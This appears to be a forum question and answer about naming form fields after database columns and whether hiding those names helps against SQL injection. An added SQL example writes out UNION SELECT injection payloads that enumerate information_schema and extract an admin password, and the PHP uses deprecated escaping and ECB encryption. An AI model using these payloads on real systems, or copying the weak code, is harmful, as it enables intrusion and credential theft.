Is it bad to name my form fields the same as my column names? I mean, do people really do:
<?php
// map each (differently named) form field onto its database column
$id      = intval($_POST['user_unique_key']);
$name    = mysql_real_escape_string($_POST['name_of_user']);
$email   = mysql_real_escape_string($_POST['user_mail_thing']);
$address = mysql_real_escape_string($_POST['user_place_of_living']);
//....
// column names go in backticks and escaped string values must be quoted,
// otherwise mysql_real_escape_string() gives no protection at all
$sql = "INSERT INTO `users` (`id`, `name`, `email`, `address`)
        VALUES ($id, '$name', '$email', '$address')";
?>
Also note that the above data validation is horrible! I would never use it.
My Data Validation: http://forums.devnetwork.net/viewtopic.php?f=50&t=118175
Should I use a table prefix like: ‘secret_prefix_’?
The final solution, which I don't really like, is that I could use a two-way hash to hash the field names. So have the input name be
<?php
// $key is the 16-byte AES-128 key, $iv a 16-byte IV (ignored by ECB but required by the call),
// and $column_name the real column name being hidden
$field_name = base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $column_name, MCRYPT_MODE_ECB, $iv));
echo $field_name;
?>
and then decode the field name once it is posted
<?php
$input = array();
foreach ($_POST as $name => $value) {
    // undo the base64 first, then decrypt, then strip the zero-byte padding mcrypt adds
    $column = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($name), MCRYPT_MODE_ECB, $iv), "\0");
    $input[$column] = $value;
}
?>
The short answer is: not always. Changing the names of the columns/databases/tables can make the application more resistant to attack if your database is configured correctly. By default an attacker can obtain this data if he has SQL injection, therefore it doesn't really matter if you give it to him.
If you do want to obscure these names then you must also revoke access to the INFORMATION_SCHEMA database:
REVOKE SELECT ON INFORMATION_SCHEMA.* FROM mysql_app_user
And here is the reason why:
A common SQL injection attack is to select juicy data from another table. In MySQL you cannot "stack queries" as in (insert into …; select * from …; grant …). So you have to use a "union select".
For instance:
The corresponding exploit is as follows:
In this case the first select statement is going to be empty, since no primary key will be zero. The 2nd select statement will select the username and password from the user table in the same database; this will grab the primary key of 1, which 99% of the time is the administrator. In order to pull this off you need to know the EXACT name of the table and the columns you need. Well, in MySQL there is the information_schema database which provides this data. So if the column and database names were obscured then they could still be obtained by the following:

This query will defeat any security prefix. However, this same attack could be used to obtain ALL columns, databases and tables in the MySQL database. If you revoke select rights from the web application's MySQL user account, then he can't do this. You should also revoke FILE privileges as these can be used to upload a backdoor or read configuration files.
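The two injections the answer describes, written out as an added MySQL example (this is not the answer's own code, whose query listings did not survive on the page). The database name demo_app, the prefixed tables secret_prefix_users and secret_prefix_news, the sample rows, and the assumption that the application runs SELECT title, body FROM secret_prefix_news WHERE id = <raw user input> are all constructed for illustration:

```sql
-- Added example, not from the original question or answer.
-- Names, rows and the vulnerable application query are constructed assumptions.
CREATE DATABASE IF NOT EXISTS demo_app;
USE demo_app;

-- The "secret" prefix the question proposes.
CREATE TABLE secret_prefix_users (
    id       INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(64)  NOT NULL,
    password VARCHAR(255) NOT NULL
);
CREATE TABLE secret_prefix_news (
    id    INT AUTO_INCREMENT PRIMARY KEY,
    title VARCHAR(200) NOT NULL,
    body  TEXT
);

-- Constructed sample data; primary key 1 is the administrative account.
INSERT INTO secret_prefix_users (username, password)
VALUES ('admin', 'constructed-hash-1'),
       ('bob',   'constructed-hash-2');
INSERT INTO secret_prefix_news (title, body)
VALUES ('Hello', 'first post');

-- Assumed vulnerable application query, with the attacker's value
-- concatenated straight into the WHERE clause:
--   SELECT title, body FROM secret_prefix_news WHERE id = <input>
-- With id = 0 the first SELECT matches nothing, so only the UNIONed
-- rows come back.

-- Step 1: the prefix is unknown, so recover table and column names from
-- information_schema. Injected value:
--   0 UNION SELECT table_name, column_name FROM information_schema.columns
--     WHERE table_schema = DATABASE()
-- The application therefore executes:
SELECT title, body FROM secret_prefix_news WHERE id = 0
UNION SELECT table_name, column_name
  FROM information_schema.columns
 WHERE table_schema = DATABASE();

-- Step 2: with the real names known, pull the first user row. Injected value:
--   0 UNION SELECT username, password FROM secret_prefix_users WHERE id = 1
-- The application therefore executes:
SELECT title, body FROM secret_prefix_news WHERE id = 0
UNION SELECT username, password
  FROM secret_prefix_users
 WHERE id = 1;
```

The step 1 query lists every (table, column) pair in the current schema, including the prefixed ones, which is why a prefix alone buys nothing once the injection exists; the step 2 query returns the admin row through the news page. Both UNIONs work only because the attacker matched the column count (two) of the original SELECT, which is the first thing an attacker probes for when building such a payload.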